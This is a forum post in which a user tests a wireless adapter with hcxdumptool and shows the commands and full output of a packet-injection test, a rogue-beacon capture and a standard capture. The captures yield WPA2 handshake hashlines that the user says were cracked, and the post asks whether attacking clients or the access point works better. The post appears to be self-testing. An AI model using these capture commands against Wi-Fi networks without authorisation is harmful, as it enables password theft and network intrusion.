01-16-2023, 12:36 PM
Testing now ACM36 with stock antennas. First tried injection:
After that turned off my AP and run hcxdumptool with essid list in beacon:Got two hashes from clients.
After that turned on AP and run hcxdumptool in standart mode:
While attacking clients. i got two hashes. While attacking AP got AP's one
From all obtained hashes password was recovered.
Question is what are the benefits of attacking client vs attacking AP?
Code:
$ sudo hcxdumptool -i wlan0 --check_injection -c 6
initialization of hcxdumptool 6.2.6 (depending on the capabilities of the device, this may take some time)...
starting antenna test and packet injection test (that can take up to two minutes)...
stage 2 of 2 probing frequency 5865/173 proberesponse 107
packet injection is working on 2.4GHz!
injection ratio: 21% (BEACON: 503 PROBERESPONSE: 107)
your injection ratio is poor - improve your equipment and/or get closer to the target
antenna ratio: 31% (NETWORK: 22 PROBERESPONSE: 7)
your antenna ratio is average, but there is still room for improvementAfter that turned off my AP and run hcxdumptool with essid list in beacon:
Code:
sudo hcxdumptool -i wlan0 -o dump.pcapng --enable_status=31 --essidlist=essid --active_beacon
SSID.......: ASK88
MAC_AP.....: 00054fca9e3c (Unknown)
MAC_CLIENT.: a07817ab4970 (Unknown)
VERSION....: 802.1X-2004 (2)
KEY VERSION: WPA2
REPLAYCOUNT: 63804
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: fdf1586b39920f78be6265942dcb96e8
HASHLINE...: WPA*02*fdf1586b39920f78be6265942dcb96e8*00054fca9e3c*a07817ab4970*41534b3838*5f163f74b712f513da4d89290b49282e661e1f86f90958873a063de9dd3c0a8d*0203007502010a0010000000000000f93c8b153e17d1c69ff3b457c403d2b9c7ae3efc4fb1e864f38890b333bcaa0ef8fd000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020c00*10
SSID.......: ASK88
MAC_AP.....: 00054fca9e3c (Unknown)
MAC_CLIENT.: dce99422f2a4 (Unknown)
VERSION....: 802.1X-2001 (1)
KEY VERSION: WPA2
REPLAYCOUNT: 63804
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: ccaf2a25d20ceb5817fb6707cc8c8ab9
HASHLINE...: WPA*02*ccaf2a25d20ceb5817fb6707cc8c8ab9*00054fca9e3c*dce99422f2a4*41534b3838*5f163f74b712f513da4d89290b49282e661e1f86f90958873a063de9dd3c0a8d*0103007502010a0000000000000000f93c1399badf3e231b14299562944641368fc032a0c91da5441cf8f00a09e9d4abe0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020c00*10After that turned on AP and run hcxdumptool in standart mode:
Code:
sudo hcxdumptool -i wlan0 -o dump.pcapng --enable_status=31
SSID.......: ASK88
MAC_AP.....: 0024fbc000e1 (Unknown)
MAC_CLIENT.: dce99422f2a4 (Unknown)
VERSION....: 802.1X-2001 (1)
KEY VERSION: WPA2
REPLAYCOUNT: 63129
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: 2068dcdb59d1472326a69744223463c5
HASHLINE...: WPA*02*2068dcdb59d1472326a69744223463c5*0024fbc000e1*dce99422f2a4*41534b3838*3df826a2aca69b771ce04743bb5602bb06fcfd6d1f006c04d487847758a78399*0103007502010a0000000000000000f6994458ce666c1df885334f1934042ad574181fc118864d1d90e6af6f3e6103e89f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020c00*10While attacking clients. i got two hashes. While attacking AP got AP's one
From all obtained hashes password was recovered.
Question is what are the benefits of attacking client vs attacking AP?